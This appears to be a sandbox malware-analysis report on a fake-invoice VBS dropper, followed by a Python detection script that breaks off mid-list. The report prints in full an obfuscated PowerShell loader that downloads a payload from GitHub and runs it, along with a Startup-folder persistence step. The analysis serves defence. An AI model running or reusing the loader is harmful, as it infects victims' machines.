Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000008.00000002.1733393024.000001B9E0410000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.1698437670.000001B9D8E3B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IHost.FullName();IWshShell3.CurrentDirectory();IHost.ScriptName();IWshShell3.SpecialFolders("Startup");IFileSystem3.FileExists("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs");IFileSystem3.CopyFile("C:\Windows\system32\FAKTURA-pdf-466366332.vbs", "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mocidade.vbs");IWshShell3.Run("cmd.exe /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Co", "0", "true");IWshShell3.Run("powershell -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR", "0", "false")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'0'+'}'+'ur'+'l'+' = {2}https:'+'//raw.gith'+'ub'+'u'+'serc'+'on'+'t'+'ent.com/NoDetect'+'On'+'/N'+'o'+'D'+'etectOn/refs'+'/h'+'eads/mai'+'n/Det'+'ah'+'No'+'th-V.txt'+'{'+'2};'+' {0}'+'ba'+'se64'+'Conte'+'nt'+' '+'= (New-'+'Ob'+'jec'+'t Sy'+'stem.Ne'+'t.W'+'e'+'bCli'+'ent).D'+'ownloadStr'+'i'+'n'+'g({0}'+'url);'+' '+'{'+'0'+'}bin'+'aryCo'+'nte'+'n'+'t '+'= '+'[Sys'+'tem'+'.'+'C'+'onver'+'t]'+':'+':'+'Fr'+'omBas'+'e64St'+'r'+'ing'+'({0}b'+'as'+'e64C'+'o'+'n'+'ten'+'t); {0}as'+'sembly = '+'['+'Refl'+'ection.As'+'s'+'embly'+']::L'+'oad({'+'0'+'}'+'binaryCo'+'nt'+'en'+'t); [dnlib'+'.I'+'O.Home]'+'::VA'+'I('+'{1'+'}'+'0/CVfjD'+'/'+'d/ee.etsa'+'p'+'/'+'/:'+'spt'+'t'+'h'+'{1}, {'+'1'+'}de'+'sati'+'v'+'ado{1}'+', '+'{'+'1}desativ'+'ado{'+'1}'+','+' '+'{1}'+'desa'+'tiv'+'ado{1}, {1'+'}MSBui'+'l'+'d{1}, '+'{1'+'}{1},'+'{1}{1}'+')') -f [chaR]36,[chaR]34,[chaR]39)|&( ([STring]$vERbOsepRefeRencE)[1,3]+'x'-JoIn'')"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzAnKyd9JysndXInKydsJysnID0gezJ9aHR0cHM6JysnLy9yYXcuZ2l0aCcrJ3ViJysndScrJ3NlcmMnKydvbicrJ3QnKydlbnQuY29tL05vRGV0ZWN0JysnT24nKycvTicrJ28nKydEJysnZXRlY3RPbi9yZWZzJysnL2gnKydlYWRzL21haScrJ24vRGV0JysnYWgnKydObycrJ3RoLVYudHh0JysneycrJzJ9OycrJyB7MH0nKydiYScrJ3NlNjQnKydDb250ZScrJ250JysnICcrJz0gKE5ldy0nKydPYicrJ2plYycrJ3QgU3knKydzdGVtLk5lJysndC5XJysnZScrJ2JDbGknKydlbnQpLkQnKydvd25sb2FkU3RyJysnaScrJ24nKydnKHswfScrJ3VybCk7JysnICcrJ3snKycwJysnfWJpbicrJ2FyeUNvJysnbnRlJysnbicrJ3QgJysnPSAnKydbU3lzJysndGVtJysnLicrJ0MnKydvbnZlcicrJ3RdJysnOicrJzonKydGcicrJ29tQmFzJysnZTY0U3QnKydyJysnaW5nJysnKHswfWInKydhcycrJ2U2NEMnKydvJysnbicrJ3RlbicrJ3QpOyB7MH1hcycrJ3NlbWJseSA9ICcrJ1snKydSZWZsJysnZWN0aW9uLkFzJysncycrJ2VtYmx5JysnXTo6TCcrJ29hZCh7JysnMCcrJ30nKydiaW5hcnlDbycrJ250JysnZW4nKyd0KTsgW2RubGliJysnLkknKydPLkhvbWVdJysnOjpWQScrJ0koJysnezEnKyd9JysnMC9DVmZqRCcrJy8nKydkL2VlLmV0c2EnKydwJysnLycrJy86Jysnc3B0JysndCcrJ2gnKyd7MX0sIHsnKycxJysnfWRlJysnc2F0aScrJ3YnKydhZG97MX0nKycsICcrJ3snKycxfWRlc2F0aXYnKydhZG97JysnMX0nKycsJysnICcrJ3sxfScrJ2Rlc2EnKyd0aXYnKydhZG97MX0sIHsxJysnfU1TQnVpJysnbCcrJ2R7MX0sICcrJ3sxJysnfXsxfSwnKyd7MX17MX0nKycpJykgLWYgIFtjaGFSXTM2LFtjaGFSXTM0LFtjaGFSXTM5KXwmKCAoW1NUcmluZ10kdkVSYk9zZXBSZWZlUmVuY0UpWzEsM10rJ3gnLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4AA74F5A push eax; retf 5_2_00007FFB4AA74FE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4AA96FB6 push esp; iretd 8_2_00007FFB4AA96FBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4AB6236C push 8B485F92h; iretd 8_2_00007FFB4AB62371
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFB4AB623BE push 8B485F92h; iretd 8_2_00007FFB4AB623C6
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2374
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1239
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180 | Thread sleep count: 2923 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 180 | Thread sleep count: 2374 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240 | Thread sleep count: 1239 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3240 | Thread sleep count: 421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1644 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312 | Thread sleep count: 4182 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312 | Thread sleep count: 5514 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Windows\System32\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\PING.EXE | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000008.00000002.1732143246.000001B9E00FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
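The behaviours in this section and the process chain in the next one are what a detection engineer would turn into checks over endpoint process-creation telemetry: cmd.exe running ping 127.0.0.1 -n 10 as a sleep before the real command, a script host (wscript.exe) spawning cmd.exe or PowerShell, a copy of the script into the Start Menu\Programs\Startup folder, and a PowerShell command line that Base64-decodes a string and re-launches powershell.exe with -executionpolicy bypass. The 922337203685477 ms delays are TimeSpan.MaxValue expressed in milliseconds, i.e. infinite waits, which the PowerShell host's own blocking waits also produce, so they are a weaker indicator than the ping loop. The following Python is an added example, not part of the report; the event records are constructed to mirror the report's process tree (the explorer.exe parent of wscript.exe is assumed, as is the shape of the log), and the -n threshold is a choice, not a value from the report.

```python
"""Triage rules for the evasion and launcher chain in this report, run over process-creation events."""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows image path (PING.EXE -> ping.exe)."""
    return PureWindowsPath(path).name.lower()


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
PING_SLEEP_MIN_COUNT = 5  # assumption: a loopback ping with -n >= 5 is a delay, not a reachability check


def ping_loopback_sleep(ev: ProcEvent) -> bool:
    """ping.exe started by cmd.exe against 127.0.0.1/localhost with a large -n count."""
    if _name(ev.image) != "ping.exe" or _name(ev.parent_image) != "cmd.exe":
        return False
    cl = ev.command_line.lower()
    count = re.search(r"-n\s+(\d+)", cl)
    return (("127.0.0.1" in cl or "localhost" in cl)
            and count is not None and int(count.group(1)) >= PING_SLEEP_MIN_COUNT)


def script_host_spawns_shell(ev: ProcEvent) -> bool:
    """wscript/cscript creating cmd.exe or PowerShell, as the report's chain does twice."""
    return _name(ev.parent_image) in SCRIPT_HOSTS and _name(ev.image) in SHELLS


def startup_folder_copy(ev: ProcEvent) -> bool:
    """A copy into the per-user Startup folder (the report's [System.IO.File]::Copy call)."""
    cl = ev.command_line.lower()
    return ("\\start menu\\programs\\startup\\" in cl
            and ("file]::copy(" in cl or "copy-item" in cl or " copy " in cl))


def decode_and_reinvoke(ev: ProcEvent) -> bool:
    """PowerShell that Base64-decodes a string and re-launches itself with the policy bypassed."""
    cl = ev.command_line.lower()
    return (_name(ev.image) in {"powershell.exe", "pwsh.exe"}
            and "frombase64string(" in cl and "-executionpolicy bypass" in cl)


RULES = {
    "ping_loopback_sleep": ping_loopback_sleep,
    "script_host_spawns_shell": script_host_spawns_shell,
    "startup_folder_copy": startup_folder_copy,
    "decode_and_reinvoke": decode_and_reinvoke,
}


def triage(events):
    """Map each event index to the names of the rules that fired on it."""
    return {i: [name for name, rule in RULES.items() if rule(ev)] for i, ev in enumerate(events)}


# Constructed sample events mirroring the report's process tree (not a real log export;
# the explorer.exe parent is assumed). Command lines follow the report's entries.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Desktop\FAKTURA-pdf-466366332.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command '
              r"[System.IO.File]::Copy('C:\Windows\system32\FAKTURA-pdf-466366332.vbs', "
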